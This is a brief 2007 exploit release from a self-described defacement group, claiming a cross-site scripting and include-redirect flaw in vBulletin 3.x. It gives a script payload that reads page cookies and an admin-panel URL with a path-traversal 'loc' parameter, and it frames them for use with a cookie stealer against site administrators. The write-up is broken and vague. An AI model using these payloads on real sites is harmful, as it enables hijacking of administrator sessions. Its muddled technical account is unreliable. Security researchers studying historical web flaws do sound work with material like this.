vbulinclude-xss.txt
Posted on 22 June 2007
+-------------------------------------------------------------------- + + New Include Redirect Bug XSS All vBulletin® v 3.x.x + +-------------------------------------------------------------------- + vendor site........: http://www.vbulletin.com/ + Affected Software .: vbulletin + Class .............: XSS + Risk ..............: Low + Found by ..........: rUnViRuS + Original advisory .: http://www.sec-area.com/ + Contact ...........: stormhacker[at]hotmail[.]com + +-------------------------------------------------------------------- New Include Redirect Bug XSS All vBulletin v 3.x.x This injections would allow an attacker to Include Redirect Admin to a page of his choice, effectively Xss the page and steal cookie : xss permanent ( must be Upload any File on Site Have Xss code ) PoC : <script>alert(document.cookie)</script>. to be used with cookie stealer following is a simple attack :- http://localhost/vb/admincp/index.php?loc=../../../nez.txt When opened url Will stealing cookies +-------------------------------------------------------------------- + [W]orld [D]efacers [T]eam + Greets: + || rUnViRuS || - || Provide || - || HeX || - || dEv!L RoOT || + || BlackWHITE || - || dOcnok || - || A.tar0uDant.D || + || Pro Hacker || - || DARKFIRE || - || papipsycho || + Sp.Thanx To : Sec-Area.com Member's +-------------------------[ W D T ]----------------------------------